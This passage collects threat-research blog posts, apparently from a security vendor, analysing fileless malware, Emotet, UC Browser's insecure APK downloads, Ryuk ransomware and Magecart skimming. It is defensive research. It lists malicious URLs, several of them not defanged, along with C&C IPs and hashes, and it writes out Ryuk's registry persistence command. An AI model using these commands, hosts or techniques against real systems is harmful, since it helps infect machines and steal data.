In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put your business, employees, and your customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months.
Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL
IOCs
URLs:
click.clickanalytics208(.)com
chrom-update(.)online
asasasqwqq(.)xyz
bitbucket(.)org/execuseme1/1312/downloads/download.hta
xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe
179(.)43(.)146(.)90/fakeurl(.)htm
sygicstyle(.)xyz
sreex(.)info/update(.)exe
clickies(.)site/CC/index(.)php
Malware payload:
5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504(download.hta)
9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0(11223344.exe)
ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf(update.exe)
Categories: Security Posts
Fileless malware campaign roundup
Criminals frequently get caught because they leave evidence at the scene of the crime—fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect.
In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware, a variant of computer-related malicious software that exists exclusively as a computer memory-based artifact. In short, the infection or malware does not write any executable files to the infected system’s hard drive.
By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.
During the past few years, the use of fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored the payload in a Windows registry. The Hancitor Trojan wrote a payload in the hollow process spawned by shellcode injected from a Word document macro in a Microsoft Word process.
Lately, we have been seeing an increase in fileless infection techniques that are leveraging legitimate applications available in the victim’s machine. These techniques do not rely on storing executable files and leave no direct traces on disks, making detection and removal a challenge. In this blog, we will discuss the recent malware campaigns that have used fileless infection mechanisms leveraging legitimate applications.
Figure 1: Stats showing hits of fileless infection chains
Case 1: njRat Backdoor
Although njRat has been around for a long time, we recently observed that this backdoor is being loaded by a fileless infection chain. A .docx file is received as an attachment in a phishing email by the victim. Once the .docx file is opened, the infection cycle begins.
Figure 2: The njRat payload loaded by fileless infection
The .docx file contains external references to remote OLE objects to be referenced in the “document.xml.rels,” which is a Rich Text Format (RTF) exploit CVE-2017-0199 that further opens the embedded .doc file containing a Visual Basic for Applications (VBA) macro.
Figure 3: The .docx downloading an RTF file
The VBA macro contains an encoded PowerShell script. It downloads the VBScript from “www[.]m9c[.]net/uploads/15676549681.jpg.” The VBScript then decodes and executes the embedded PowerShell script. The PowerShell script then downloads the encrypted Portable Executable (PE) file from “www[.]m9c[.]net/uploads/15676547971.jpg,” which is the njRat executable.
Figure 4: The VBS PowerShell downloads an encoded PE file
This VBScript decrypts the PE file, which is a .NET executable that is directly loaded in the memory and runs in the context of an MSbuild.exe. No traces of a disk write are observed and the backdoor njRat silently executes under the hood by communicating with the CnC server “borapegar147[.]ddns[.]net”.
Case 2: Sodinokibi Ransomware
The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware types in the wild today. It has been on the rise since the threat group behind the malware operation GandCrab announced that it had shut down its operations at the end of May. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism.
Figure 5: The Sodinokibi payload loaded by a fileless infection
The fileless infection cycle starts when the victim clicks the BAT file that is received as an attachment in a phishing email. The BAT file contains a PowerShell script containing Base64 encoded expressions.
Figure 6: The BAT file received via MalSpam
As shown below in the decoded PowerShell script, this script downloads another PowerShell script containing more than 3,000 lines of code and a Base64-encoded portable executable file (PE) from a pastebin URL and loads it while invoking a function that initiates the attack in the system's memory.
Figure 7: The decoded PowerShell expressions
Figure 8: The encoded PE file in PowerShell downloaded from the pastebin
This script decodes and provides the PE file to a loader function, which takes care of injecting this file directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually Sodinokibi ransomware. We see no traces of the DLL being saved on the disk as the ransomware silently starts encrypting files on the system.
Case 3: Astaroth Backdoor
The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and the infection cycle is covered in detail by Microsoft. The infection chain starts with a victim clicking on an LNK file that is delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.
Figure 9: The obfuscated WMIC command
This JavaScript code downloads a Base64-encoded payload by abusing the Bitsadmin tool and decodes it using the Certutil tool. The payloads are XOR-encrypted PE files except one of the DLL files, which is loaded by leveraging the Regsvr32 tool. Finally, this DLL file decrypts the payload of the backdoor Astaroth and maps it in the Windows userinit process.
Figure 10: Obfuscated JavaScript in an XSL file
During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without traces on the filesystem.
The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored.
Conclusion
Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.
Categories: Security Posts
Emotet is back in action after a short break
It’s common for cybercriminals to launch an attack, then shortly thereafter stop the campaign before they are detected. These breaks also give these bad actors a chance to change tactics to, once again, attempt to avoid detection. That’s what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form.
Emotet operators took about a two-month break as command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September.
Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware threats on a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult.
Emotet is modular by design, as it supports multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download and to be downloaded by other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.
Email conversation hijacking
This year, Emotet employed a new tactic of using stolen email content in spam campaigns. The hijacking of existing email threads can be very effective as recipients are tricked into believing that the email was sent by the other person in the email thread. This trust factor can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet.
Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019.
Figure 2: The new Emotet campaign after the break.
New campaign, new document templates, and new botnets?
We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.
Figures 3 and 4: New macro templates (Product Notice and Protected View)
Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch2 (E2), that were using unique RSA keys to communicate with their C&C. After the break, we noticed three new RSA keys being used, which suggests the possibility of a botnet splitting into multiple botnets. Earlier keys were no longer seen in use and the latest three keys are now being used, which means operators are reorganizing their botnet infrastructure.
Already existing RSA keys
-----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx\nS0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc\nhG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB\n-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+\n0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ\nWcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB\n-----END PUBLIC KEY-----
New RSA keys
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2\nPV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C\nAtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP\n4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc\niJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----
Figure 5: Emotet RSA keys used before and after the break.
RSA1 and RSA2 were used before the break. In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (1, 2, 3, 4, and 5 are assigned based on their first observation sequence in the wild).
Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots).
Figure 6: Emotet RSA keys and C&C infrastructure before the break.
Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign.
If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch is divided into two while the other one is used to create a single botnet with some new C&Cs.
Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.
Emotet Downloader payload - Technical analysis
The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file further downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3).
We will take a look at one such malicious document for the purpose of analysis here -
MD5 – 359696113a2156617c28d4f79cc7d44b (“file 20190924 LTR6051.doc”)
The macro in the documents is quite simple and straightforward but contains lots of junk.
Figure 9: Macro code containing junk instructions.
After removing the junk, this is how the macro code looks.
Figure 10: Cleaned macro code.
It gets its text from TextBox1 in UserForm2, then saves that in a "JS" file before executing that file.
Figure 11: A user form containing javascript code.
This JavaScript file is heavily obfuscated. More obfuscation is being added to the "JS" code incrementally. As in earlier versions of this downloader, some of the strings and function names were readable and now almost every string is obfuscated.
Figure 12: Heavily obfuscated script
This script contains an array of strings in variable “a.” First, the elements of the array are shuffled using an anonymous function just after the array definition. Then there is function “b,” which is used to decrypt strings and is extensively used throughout the script. Using this function, we can log the decrypted strings just before they return. Some of the interesting strings include:
\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))
while (true) {}
return (function()
{}.constructor("return this")( )
4|0|7|5|3|1|8|2|6
2|1|0|6|3|5|4
split
debug
error
exception
trace
http://thewomentour.com/wp-includes/f8yezb9/
WScript.Shell
ResponseBody
ActiveXObject
https://www.marquedafrique.com/k9c5qh/eb1wiw8192/
Scripting.FileSystemObject
CreateObject
https://thecrystaltrees.com/nofij3ksa/o5523/
http://4excellent.com/wp-includes/ii950106/
WScript.Shell
Popup
MSXML2.XMLHTTP
GET
open
send
http://www.davidleighlaw.com/wp-content/wlfsj15707/
Position
Open
Type
SaveToFile
random
toString
substr
0|1|3|4|2
11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12
return (function()
{}.constructor("return this")( )
7|2|8|0|5|1|4|6|3
2|0|3|4|1
0|14|11|8|3|6|13|9|5|2|1|12|4|10|7
Not Supported File Format
There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded).
The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick a user into believing the file is corrupt:
Figure 13: An error message to trick a user into believing the file is corrupt.
There are multiple URLs embedded in the script files. The following URLs were extracted from this script:
http://thewomentour[.]com/wp-includes/f8yezb9/
https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/
https://thecrystaltrees[.]com/nofij3ksa/o5523/
http://4excellent[.]com/wp-includes/ii950106/
http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/
In this case, the Emotet loader is downloaded from “http://thecrystaltrees[.]com/nofij3ksa/o5523/” (MD5 – 402b20268d64acded1c48ce760c76c47).
The Emotet loader already has been extensively analyzed and blogged about, so we won't be getting into technical details of the loader here. Below are artifacts extracted from this sample:
RSA key extracted from this sample:
-----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB\n-----END PUBLIC KEY-----
C&C server addresses from the sample:
187[.]188[.]166[.]192:80,
200[.]57[.]102[.]71:8443,
200[.]21[.]90[.]6:8080,
46[.]41[.]134[.]46:8080,
178[.]249[.]187[.]151:8080,
217[.]199[.]160[.]224:8080,
71[.]244[.]60[.]230:7080,
119[.]59[.]124[.]163:8080,
185[.]86[.]148[.]222:8080,
190[.]230[.]60[.]129:80,
178[.]79[.]163[.]131:8080,
186[.]83[.]133[.]253:8080,
179[.]62[.]18[.]56:443,
91[.]205[.]215[.]57:7080,
217[.]113[.]27[.]158:443,
181[.]36[.]42[.]205:443,
190[.]19[.]42[.]131:80,
183[.]82[.]97[.]25:80,
77[.]245[.]101[.]134:8080,
109[.]104[.]79[.]48:8080,
159[.]203[.]204[.]126:8080,
5[.]77[.]13[.]70:80,
189[.]187[.]141[.]15:50000,
46[.]28[.]111[.]142:7080,
46[.]21[.]105[.]59:8080,
189[.]166[.]68[.]89:443,
183[.]87[.]87[.]73:80,
190[.]200[.]64[.]180:7080,
79[.]143[.]182[.]254:8080,
119[.]92[.]51[.]40:8080,
187[.]155[.]233[.]46:443,
89[.]188[.]124[.]145:443,
201[.]163[.]74[.]202:443,
62[.]75[.]160[.]178:8080,
51[.]15[.]8[.]192:8080,
46[.]29[.]183[.]211:8080,
62[.]75[.]143[.]100:7080,
114[.]79[.]134[.]129:443,
190[.]230[.]60[.]129:80,
190[.]117[.]206[.]153:443,
203[.]25[.]159[.]3:8080,
217[.]199[.]175[.]216:8080,
80[.]85[.]87[.]122:8080,
190[.]1[.]37[.]125:443,
23[.]92[.]22[.]225:7080,
81[.]169[.]140[.]14:443,
46[.]163[.]144[.]228:80,
5[.]196[.]35[.]138:7080,
189[.]129[.]4[.]186:80,
151[.]80[.]142[.]33:80,
190[.]221[.]50[.]210:8080,
190[.]104[.]253[.]234:990,
71[.]244[.]60[.]231:7080,
91[.]83[.]93[.]124:7080,
181[.]81[.]143[.]108:80,
181[.]188[.]149[.]134:80,
50[.]28[.]51[.]143:8080,
123[.]168[.]4[.]66:22,
211[.]229[.]116[.]97:80,
201[.]184[.]65[.]229:80,
77[.]55[.]211[.]77:8080,
212[.]71[.]237[.]140:8080,
190[.]38[.]14[.]52:80,
46[.]41[.]151[.]103:8080,
149[.]62[.]173[.]247:8080,
87[.]106[.]77[.]40:7080,
86[.]42[.]166[.]147:80,
109[.]169[.]86[.]13:8080,
88[.]250[.]223[.]190:8080,
138[.]68[.]106[.]4:7080,
200[.]58[.]171[.]51:80
Conclusion
Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats.
ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard
Categories: Security Posts
UC Browser app abuses may have exposed 500 million users
Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits in relation to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.
Fig. 1: UC Browser on Google Play
As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (HTTP over HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: “An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play.”
We decided to explore further into the UC Browser app and found the following issues, which will be discussed in detail in this blog:
Downloading an additional APK from a third party – in violation of Google Play policy
Communication over an unsecured channel – opening doors to man-in-the-middle attacks
Dropping an APK on external storage (/storage/emulated/0) – allowing other apps, with appropriate permissions, to tamper with the APK
We found another app called UC Browser Mini from the same developer with the same functionality and issues, and it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.
Fig. 2: UC Browser Mini (UC Mini)
It is important to note that these issues have the potential to affect millions of Android users because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.
Timeline: August 13, 2019: Zscaler reported policy violation to Google.
August 13, 2019: Google promptly responded. Case assigned to an investigation team.
August 13 – September 25, 2019: Follow-up emails with research details.
September 27, 2019: Google confirmed policy violation by UC Browser and UC Mini. Google contacted UC developers to update the apps and remediate the policy violation.
Update: After Google's intervention, the Zscaler research team noticed that the latest version of both the apps, UC Browser and UC Mini, have stopped downloading the third-party app store.
Technical Details of UC Browser
Name: UC Browser Package Name: com.UCMobile.intl Installs: 500,000,000+ (500M +) Developer: UCWeb Singapore Pte. Ltd.
1. Downloading an APK from a third party
Upon finding the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up default language, topics of interest, location, and so on.
Fig. 3: UC Browser app icon and initial Android activity
After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK on to the user’s device. The screenshot below illustrates the chain of requests and redirects taking place:
Fig. 4 Unsecured requests for APK download
This functionality of dropping another APK from a third-party source clearly violates Google Play’s policy, which includes the following:
“An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser).” During our analysis, we found the APK being dropped on external storage but we did not find the APK being installed. It is possible that this functionality is still under development or there may be other reasons it wasn’t installed, such as exception, disabled unknown-sources option, or rooted device.
2. Communication over an unsecured channel
The APK was downloaded over an unsecured channel (HTTP over HTTPS), opening the possibility for man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they talk about libraries being downloaded over HTTP and, in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog).
The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further.
We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but had a different full-name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right):
Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)
It could be that the same app had been uploaded again on Google Play with a different name and developer along with modified or enhanced code to download additional APKs.
3. Dropping an APK on external storage
We also noticed that the additional APK being dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK:
Fig. 6: Dropped APK storage location
An APK being placed on external storage, or any other app with storage permission (android:name=android.permission.READ/WRITE_EXTERNAL_STORAGE) can have access to this location and can tamper with the downloaded APK.
Analysis of the dropped APK
During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is due to the fact that the functionality is still under development or if there is another reason the APK is not installing. But we did want to find out what the APK contained, so we decided to manually install it and have a look inside. To our surprise, we found that the APK was actually a third-party app store named “9 Apps” with the package name com.mobile.indiapp.
Fig. 7: 9Apps app install process
After installing the app, it scans the device for installed apps. The app’s scanning and further activities can be seen in the screenshots below:
Fig. 8: 9Apps initial activities
We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:
Fig. 9: Adult apps on 9Apps store
We tried downloading a small-sized app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:
Fig. 10: Sample APK download requests
Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from this 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:
Fig. 11: Zscaler dashboard showing the domain’s activity
Conclusion
The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections:
Fig. 12: VirusTotal search for the domain
It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat.
Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app’s use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as display phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers.
Once a user device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in your network, so they can snoop, spread malware, or steal data.
Categories: Security Posts
Examining the Ryuk Ransomware
Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.
The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups.
Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware can encrypt a victim's data while blocking the infected system from restoring the data.
Analysis
Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks to see if it is being executed in a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed in Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed in Windows Vista or later versions of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe”. Next, it executes the payload using the ShellExecuteW API.
Persistence mechanism
Ryuk adds the following registry key so it will execute at every login. It uses the command below to create a registry key:
""C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f"
Process injection
Ryuk injects its main code into several remote processes. Ryuk enumerates the process by calling the CreateToolhelp32Snapshot API and injecting its code in all the processes except the ones named explorer.exe, lsaas.exe and csrss.exe, telling it that it should not be executed by the NT AUTHORITY.
Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk.
Figure 1: The list of services disabled by the Ryuk ransomware.
The screenshot below shows the list of processes terminated by Ryuk.
Figure 2: The list of processes terminated by the Ryuk ransomware.
Ryuk also deletes shadow copies and other backup storage files by using a .BAT file so that the infected system can’t restore data. Below is the list of commands used by Ryuk to perform these deletions.
Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.
Encryption and similarity with Hermes ransomware
Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts the files with an AES key. Further, the AES key is encrypted with an embedded public key and is appended at the end of the encrypted file. If all the samples contain the same RSA key pair, then after getting access to one private key, it's easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extensions after encrypting the files.
Ryuk has a common feature with Hermes ransomware. During encryption, Ryuk adds a marker in the encrypted file using the keyword “HERMES”. Ryuk checks for the HERMES marker before encrypting any file to know if it has been already encrypted. The screenshot below displays the HERMES marker and encrypted AES key appended at the end of the encrypted file.
Figure 4: The HERMES marker and the encrypted AES key.
Ryuk encrypts files in every drive and network shared from the infected system. It has whitelisted a few folders, including “Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab” so it won’t encrypt files inside these folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot for RyukReadMe.txt file.
Figure 5: Ryuk ransomware ransom note.
After completing the encryption, Ryuk creates two files. One is “Public” and contains an RSA public key while the second is “UNIQUE_ID_DO_NOT_REMOVE” and contains a unique hardcoded key.
Conclusion
While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hopes of large payoffs. Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.
IOCs
MD5
5AC0F050F93F86E69026FAEA1FBB4450
6CDCB9F86972EFC4CFCE4B06B6BE053A
31BD0F224E7E74EEE2847F43AAE23974
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.
Categories: Security Posts
Magecart hits again, leveraging compromised sites and newly registered domains
During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. This injected script looks for the payment method and personally identifiable information (PII) and captures supplied financial information which is then sent to an adversary-controlled gate server even before the user hits the submit form. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the hacker group’s activities in the past. (Read previous blogs from September 2018 and July 2019.)
In this blog, we will provide an overview of the current skimming campaigns with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains.
The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue.
Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)
Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted.
Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts)
This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding.
The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code possesses little to no obfuscation.
Cycle 1:
Compromised site loads skimmer code from another compromised site
The following image shows a Fiddler session to demonstrate the skimming chain.
Figure 3: Fiddler session for Magecart skimming
In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is compromised as well and was registered on 2013-03-19.
Figure 4: Example of injected script and skimmer code
The way this skimmer code operates is to wait for the user to fill in the personal information and payment method and capture it all before the user hits the submit button. This captured information is then encoded using the Base64 algorithm and sent to the gate URL in a GET request.
Figure 5: Skimmer script sending base64 encoded PII and Payment Information GET Request
Cycle 2:
Compromised site loads skimmer code from a newly registered domain
As shown in the image below, the skimming script is being hosted on a domain registered just 10 days before this analysis.
Figure 6: Compromised site leveraging skimmer script from a newly registered domain
All the skimmer scripts we’ve identified so far are similar, and we observed the following common gate URL pattern:
hxxps://domain/{path}.(php|js)?hash=[base64data]
Figure 7: Skimmer script differences
We saw multiple cases where the same skimmer code locations were being used in multiple compromised sites, including:
custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js
matteola[dot]com/js/varien/js.js
The image below shows examples of skimmer code locations being used for multiple compromised sites.
Figure 8: The same skimmer code locations used in multiple compromised sites
Conclusion
Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now, we are seeing attackers able to steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks.
Appendix
Common skimmer JS URL patterns
/5d1cbc8c073d4.js
/baypressservices/baypr.js
/check_cvv2_number_script.js
/datetimepicker/bootstrap-datetimepicker.min.js
/images/js/googleapi.js
/javascript/checkcheckout.js
/5d4cdc4cdf344.js
/js/afterpay/checkout/idev_onestep.js
/js/check_analystic.js
/js/extjs/fix-defer-after.js
/js/footer-link.js
/js/front-scripts.min.js
/js/lib/ccard.js
/js/mage/cookies.js
/js/mage/google.js
/js/prototype/prototype.js
/js/scriptaculous/print.js
/varien/email.js
/varien/js.js
/varien/mail.js
/my/vmart.js
/qcore.js
/rimzoneonline/code.js
/silver/acor.js
/wp-includes/js/jquery/jquery.js
Bad domains
Creation date
api-googles[dot]com
2019-03-30T18:40:29Z
cloudflara[dot]org
2019-07-10T19:16:22Z
developer-js[dot]info
2019-03-07T21:29:25Z
facebookfollow[dot]com
2019-07-21T02:29:39Z
googletagmanager-service[dot]com
2019-02-09T23:28:49Z
gooqleadvstat[dot]com
2019-09-13T11:22:10Z
jquery-cdn[dot]top
2018-09-28T07:41:02Z
jquery-js[dot]com
2017-01-02T11:21:35Z
jquery[dot]su
2019-02-27T19:12:36Z
jquerycodemagento[dot]com
2019-08-11T13:05:43Z
magento-security[dot]org
2017-11-14T16:32:41Z
magento-track[dot]com
2018-12-28T20:44:11Z
script-analytics[dot]com
2019-08-13T22:16:38Z
Categories: Security Posts
Phishing attacks abusing appspot.com and web.app domains on Google Cloud
